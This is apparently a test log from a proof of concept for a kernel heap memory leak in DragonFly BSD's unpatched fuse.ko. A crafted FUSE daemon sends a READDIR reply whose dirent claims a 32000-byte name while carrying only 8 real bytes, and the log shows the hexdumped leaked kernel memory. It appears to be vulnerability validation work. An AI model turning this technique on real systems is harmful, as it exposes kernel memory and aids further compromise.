=== BASELINE (unpatched fuse.ko) — leak fires === Kernel: DragonFly 6.5-DEVELOPMENT #0: Thu Jul 2 06:02:54 UTC 2026 fuse.ko: Id Refs Address Size Name 10 1 0xffffffff82600000 a9000 fuse.ko === warmup run 1 === === kernel wrote through user-buffer offset 32023 (bytes [0..32023]) === === expected write size if namelen=32000 honored: _DIRENT_RECLEN(32000) = 32016 bytes === === honored d_namlen = 32000 (daemon claimed 32000) === === 72 non-zero non-marker bytes in window [24..32024) (past the 8-byte real name) === [LEAK-PROOF] kernel wrote 32024 bytes; d_namlen honored = 32000; real name bytes from daemon = 8; => 32000 bytes were read from past the daemon's reply buffer === DECISIVE RUN WITH FULL HEXDUMP === [trigger] opened /mnt/fuse fd=3, getdents(buf,65536)... [trigger] getdents returned -1 (errno 22: Invalid argument) === kernel wrote through user-buffer offset 32023 (bytes [0..32023]) === === expected write size if namelen=32000 honored: _DIRENT_RECLEN(32000) = 32016 bytes === === first 1024 bytes hexdump === 0200000000000000 007d080000000000 4142434445464748 a821628d00f8ffff 0800000000000000 0200000000000000 0000000000000000 007d000008000000 4142434445464748 010000000a000000 7023628d00f8ffff 7b23628d00f8ffff 72636e675f646863 7064006469736162 6c65640000000000 8820628d00f8ffff 1400000000000000 0200000000000000 0000000000000000 007d000008000000 4142434445464748 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 === honored d_namlen = 32000 (daemon claimed 32000) === === 72 non-zero non-marker bytes in window [24..32024) (past the 8-byte real name) === === 0 candidate kernel pointers found === === leaked window hexdump (first 256 bytes past real name): === a821628d00f8ffff 0800000000000000 0200000000000000 0000000000000000 007d000008000000 4142434445464748 010000000a000000 7023628d00f8ffff 7b23628d00f8ffff 72636e675f646863 7064006469736162 6c65640000000000 8820628d00f8ffff 1400000000000000 0200000000000000 0000000000000000 007d000008000000 4142434445464748 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 === stride sample: every 256th byte of [0x18 .. 0x8000) === off=0x0018: a8 off=0x0118: 00 off=0x0218: 00 off=0x0318: 00 off=0x0418: 00 off=0x0518: 00 off=0x0618: 00 off=0x0718: 00 off=0x0818: 00 off=0x0918: 00 off=0x0a18: 00 off=0x0b18: 00 off=0x0c18: 00 off=0x0d18: 00 off=0x0e18: 00 off=0x0f18: 00 off=0x1018: 00 off=0x1118: 00 off=0x1218: 00 off=0x1318: 00 off=0x1418: 00 off=0x1518: 00 off=0x1618: 00 off=0x1718: 00 off=0x1818: 00 off=0x1918: 00 off=0x1a18: 00 off=0x1b18: 00 off=0x1c18: 00 off=0x1d18: 00 off=0x1e18: 00 off=0x1f18: 00 off=0x2018: 00 off=0x2118: 00 off=0x2218: 00 off=0x2318: 00 off=0x2418: 00 off=0x2518: 00 off=0x2618: 00 off=0x2718: 00 off=0x2818: 00 off=0x2918: 00 off=0x2a18: 00 off=0x2b18: 00 off=0x2c18: 00 off=0x2d18: 00 off=0x2e18: 00 off=0x2f18: 00 off=0x3018: 00 off=0x3118: 00 off=0x3218: 00 off=0x3318: 00 off=0x3418: 00 off=0x3518: 00 off=0x3618: 00 off=0x3718: 00 off=0x3818: 00 off=0x3918: 00 off=0x3a18: 00 off=0x3b18: 00 off=0x3c18: 00 off=0x3d18: 00 off=0x3e18: 00 off=0x3f18: 00 off=0x4018: 00 off=0x4118: 00 off=0x4218: 00 off=0x4318: 00 off=0x4418: 00 off=0x4518: 00 off=0x4618: 00 off=0x4718: 00 off=0x4818: 00 off=0x4918: 00 off=0x4a18: 00 off=0x4b18: 00 off=0x4c18: 00 off=0x4d18: 00 off=0x4e18: 00 off=0x4f18: 00 off=0x5018: 00 off=0x5118: 00 off=0x5218: 00 off=0x5318: 00 off=0x5418: 00 off=0x5518: 00 off=0x5618: 00 off=0x5718: 00 off=0x5818: 00 off=0x5918: 00 off=0x5a18: 00 off=0x5b18: 00 off=0x5c18: 00 off=0x5d18: 00 off=0x5e18: 00 off=0x5f18: 00 off=0x6018: 00 off=0x6118: 00 off=0x6218: 00 off=0x6318: 00 off=0x6418: 00 off=0x6518: 00 off=0x6618: 00 off=0x6718: 00 off=0x6818: 00 off=0x6918: 00 off=0x6a18: 00 off=0x6b18: 00 off=0x6c18: 00 off=0x6d18: 00 off=0x6e18: 00 off=0x6f18: 00 off=0x7018: 00 off=0x7118: 00 off=0x7218: 00 off=0x7318: 00 off=0x7418: 00 off=0x7518: 00 off=0x7618: 00 off=0x7718: 00 off=0x7818: 00 off=0x7918: 00 off=0x7a18: 00 off=0x7b18: 00 off=0x7c18: 00 off=0x7d18: 5a off=0x7e18: 5a off=0x7f18: 5a [LEAK-PROOF] kernel wrote 32024 bytes; d_namlen honored = 32000; real name bytes from daemon = 8; => 32000 bytes were read from past the daemon's reply buffer === daemon log === [main] opened /dev/fuse fd=3 [daemon] serving on fd 3 [daemon] INIT major=7 minor=28 -> reply [main] mounted fuse on /mnt/fuse (daemon pid 2144) [main] now run: ./read_trigger /mnt/fuse (triggers leak) [daemon] READDIR node=root REPLYING 48-byte pkt with dirent.namelen=32000 (only 8 real name bytes) -> kernel will bcopy 32000 bytes from 8-byte name = LEAK 31992 bytes of kernel heap past reply buffer [daemon] unhandled opcode 30 [daemon] READDIR node=root REPLYING 48-byte pkt with dirent.namelen=32000 (only 8 real name bytes) -> kernel will bcopy 32000 bytes from 8-byte name = LEAK 31992 bytes of kernel heap past reply buffer [daemon] unhandled opcode 30 === guest survived === 10:53AM up 37 mins, 0 users, load averages: 0.05, 0.01, 0.00